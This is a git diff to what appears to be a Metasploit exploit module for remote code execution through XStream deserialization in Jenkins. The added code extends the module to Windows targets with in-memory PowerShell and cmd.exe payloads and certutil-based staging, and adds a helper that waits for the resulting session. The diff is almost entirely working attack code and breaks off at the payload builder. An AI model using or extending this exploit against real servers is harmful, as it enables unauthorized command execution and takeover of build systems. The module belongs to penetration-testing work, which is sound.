diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
index f68ad258ed..4b6f3472c1 100644
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -43,6 +43,20 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform'   => 'python',
           'Arch'       => ARCH_PYTHON
         ],
+        ['PowerShell (In-Memory)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ],
+        ['Windows (CMD)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_CMD],
+          'Payload' => {
+            'Compat'     => {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'adduser, generic'
+            }
+          }
+        ],
         ['Linux (Dropper)',
           'Platform'   => 'linux',
           'Arch'       => [ARCH_X86, ARCH_X64]
@@ -57,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
       Opt::RPORT('8080')
     ])
     deregister_options('URIPATH')
@@ -82,23 +97,29 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target.name
-    when /Unix/, /Python/
+    when /Unix/, /Python/, /CMD/
       execute_command(payload.encoded)
+    when /PowerShell/
+      execute_command(payload.encoded)
+      wait_for_session
     else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :certutil})
+      wait_for_session
     end
   end
 
   # Exploit methods
-
   def execute_command(cmd, opts = {})
     cmd = case target.name
     when /Unix/, /Linux/
       %W{/bin/sh -c #{cmd}}
     when /Python/
       %W{python -c #{cmd}}
-    when /Windows/
+    when /Windows/, /CMD/
       %W{cmd.exe /c #{cmd}}
+    when /PowerShell/
+      psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
     end
 
     # Encode each command argument with XML entities
@@ -113,6 +134,20 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def wait_for_session
+    print_status "Waiting for exploit to complete..."
+    begin
+      Timeout.timeout(datastore['ListenerTimeout']) do
+        loop do
+          break if session_created?
+          Rex.sleep(0.25)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
+    end
+  end
+
   def xstream_payload(cmd)
     <<EOF
 <map>